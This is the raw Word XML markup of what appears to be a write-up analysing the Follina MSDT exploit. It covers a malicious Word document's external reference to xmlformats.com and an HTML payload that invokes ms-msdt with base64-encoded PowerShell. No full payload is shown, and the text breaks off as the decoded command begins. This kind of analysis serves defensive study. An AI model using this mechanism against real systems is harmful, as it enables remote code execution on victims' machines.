          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code of how the vulnerability is exploited</w:t>
      </w:r>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="005F6209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A28072" w14:textId="4814D371" w:rsidR="00C20E63" w:rsidRPr="003907CB" w:rsidRDefault="00C20E63" w:rsidP="0035550F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>An internal Microsoft Word document that was first released on Twitter by "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Nao_sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>" was studied by researchers</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [4]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. To fully comprehend the document's structure and contents, they examined the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document.xml.rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>" file in particular</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91BB65" w14:textId="77777777" w:rsidR="00C20E63" w:rsidRPr="003907CB" w:rsidRDefault="00C20E63" w:rsidP="00C20E63">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D6B638" w14:textId="113E8C8C" w:rsidR="00B30EF5" w:rsidRDefault="00B30EF5" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B55F17F" wp14:editId="1C3BEF88">
            <wp:extent cx="2781300" cy="1761038"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1509641599" name="Picture 2" descr="AGk0z-Nw863bCoqJyqzHawiKjw85aE9B9niLdyjI8nP81oRTrKc3jO2Nc8LQJsFb1HBEWOTC3ARSMY2bdKpAWlse1ZI3UO7LLPrsOmzH8A8=s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k0z-Nw863bCoqJyqzHawiKjw85aE9B9niLdyjI8nP81oRTrKc3jO2Nc8LQJsFb1HBEWOTC3ARSMY2bdKpAWlse1ZI3UO7LLPrsOmzH8A8=s94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10273" cy="1779383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A1605" w14:textId="0FA8A055" w:rsidR="003907CB" w:rsidRPr="0027035D" w:rsidRDefault="003907CB" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure 2: The image shows a terminal with commands being executed to unzip and examine the contents of a Microsoft Word document, focusing on the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.xml.rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" file to understand its structure</w:t>
      </w:r>
      <w:r w:rsidR="0027035D" w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A77BE" w14:textId="0B878A32" w:rsidR="00C20E63" w:rsidRPr="003907CB" w:rsidRDefault="00C20E63" w:rsidP="00E115DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">An external reference with a lengthy endpoint that eventually led to an HTML file with an exclamation point at the end was made to "xmlformats.com" [5]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505ECA4" w14:textId="77777777" w:rsidR="00C20E63" w:rsidRPr="003907CB" w:rsidRDefault="00C20E63" w:rsidP="00C20E63">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7572A41B" w14:textId="417F0E75" w:rsidR="001C6D69" w:rsidRDefault="001C6D69" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A18A75A" wp14:editId="671D5E83">
            <wp:extent cx="5731510" cy="1009015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="611548455" name="Picture 1" descr="AGk0z-Mh2jUKtAL6bGu7KnQBIxCBYLzG96FJhvWysAiXJhfMjqPJhB55rQrc-ObOELbgQ6YMcXD5LX4SS-1aoqsRsx-Rt_cfslfz151U1FA=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k0z-Mh2jUKtAL6bGu7KnQBIxCBYLzG96FJhvWysAiXJhfMjqPJhB55rQrc-ObOELbgQ6YMcXD5LX4SS-1aoqsRsx-Rt_cfslfz151U1FA=s160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009015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD77393" w14:textId="33DC6440" w:rsidR="0027035D" w:rsidRPr="009001A3" w:rsidRDefault="003907CB" w:rsidP="009001A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Text in the image describes a security analysis of an HTML file at "xmlformats.com," which is linked from an external reference within a document. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7414EA" w14:textId="53CA04F8" w:rsidR="009001A3" w:rsidRPr="009001A3" w:rsidRDefault="00C20E63" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The initial tweet from "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Nao_sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>" included a link to "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>any.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>," a cloud-based sandbox environment that may be used for dynamic analysis to watch network traffic, created processes, and dumped files. The contents hosted at the HTML endpoint of the now-defunct "xmlformats.com" website were discovered through this research. The noteworthy thing about the aforementioned HTML file was that it had a script tag that allowed client-side scripting. It also contained an unusually high number of commented "A" characters, which is interesting. The HTML file in question was called RDF842l.html</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D474DB" w14:textId="7FBD3780" w:rsidR="00D20989" w:rsidRDefault="00D20989" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1014203C" wp14:editId="478CB52B">
            <wp:extent cx="5630993" cy="3726180"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="67695945" name="Picture 16" descr="AGk0z-NzyeIhzJVD1QdOetaZ2sUrDFl6qNPO5AcWdKj6sBXrxC1e42aj2wED0QUnClPyvP-YY18KALWbKqCziwpSJPvjiWCn5F0q_JbyLQc=s1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k0z-NzyeIhzJVD1QdOetaZ2sUrDFl6qNPO5AcWdKj6sBXrxC1e42aj2wED0QUnClPyvP-YY18KALWbKqCziwpSJPvjiWCn5F0q_JbyLQc=s159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0993" cy="3726180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0281B5BB" w14:textId="1434C3A5" w:rsidR="003907CB" w:rsidRPr="0027035D" w:rsidRDefault="003907CB" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: </w:t>
      </w:r>
      <w:r w:rsidR="0027035D" w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It highlights the discovery of an HTML file from "xmlformats.com" with a peculiarly high number of commented "A" characters and a script tag for client-side scripting, named RDF8421.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405EAE73" w14:textId="33D09926" w:rsidR="00C20E63" w:rsidRPr="009001A3" w:rsidRDefault="00C20E63" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scrolling down felt somewhat pointless at first. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBE300" w14:textId="49E3B9E0" w:rsidR="006858C9" w:rsidRDefault="00F74841" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC80919" wp14:editId="514B0F09">
            <wp:extent cx="5731510" cy="2268855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="268336072"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268855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC76C8B" w14:textId="1561B7DE" w:rsidR="003907CB" w:rsidRPr="0027035D" w:rsidRDefault="003907CB" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: </w:t>
      </w:r>
      <w:r w:rsidR="0027035D" w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It shows a crafted URL meant to exploit the MSDT protocol via a PowerShell command. The code contains a string of base64 and other character encodings, leading to the execution of a stub program from the Windows system directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963B0B3" w14:textId="27BEBC0C" w:rsidR="00B30EF5" w:rsidRPr="008C1682" w:rsidRDefault="008C1682" w:rsidP="00E115DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We could see originally its invoking payload setting “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” to be “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” and parameters (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IT_RebrowseForFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and arguments necessary eventually staging </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> code embedded within $() to be executed encoded in base64. We could decode the base64 and get a little bit of a better understanding of what was happening here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDD002" w14:textId="77777777" w:rsidR="00F74841" w:rsidRPr="003907CB" w:rsidRDefault="00E143FD" w:rsidP="00F74841">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
